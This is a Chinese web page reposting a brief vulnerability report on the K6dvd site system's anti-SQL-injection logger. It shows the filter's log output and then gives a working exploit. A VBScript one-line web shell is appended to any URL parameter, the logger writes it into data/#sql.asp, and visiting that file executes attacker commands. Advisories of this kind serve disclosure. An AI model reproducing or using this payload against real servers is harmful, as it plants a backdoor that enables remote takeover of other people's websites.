文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>K6dvd 音乐网防注入程序漏洞

K6dvd 音乐网防注入程序漏洞

时间:2011-04-22  来源:秩名

发布日期:2011-04.22
发布作者:佚名

漏洞类型:设计错误
漏洞分析:

K6dvd 影视系统是国内不错的音乐发表管理系统!

随便找了个带参数的URL 提交了个' 返回如下:



恩,防注射系统!大多搞渗透的朋友应该都见过~

非法操作!系统做了如下记录↓
操作IP:xxx.xxx.xxx.xx
操作时间:2009-5-28 19:33:47
操作页面:/yxplay.asp
提交方式:GET
提交参数:id
提交数据:109446'



利用方法,在任何的URL参数后面带上 and =><script runat=server language=vbscript>eval request(chr(35))</script>

然后访问data/%23sql.asp 就可以执行一句话小马了:


 

标签分类:

相关阅读 更多 +
排行榜 更多 +
幣安BNB币行情神器

幣安BNB币行情神器

金融理财 下载
愤怒的火柴人4中文版下载

愤怒的火柴人4中文版下载

角色扮演 下载
嘟嘟脸恶作剧手游下载

嘟嘟脸恶作剧手游下载

休闲益智 下载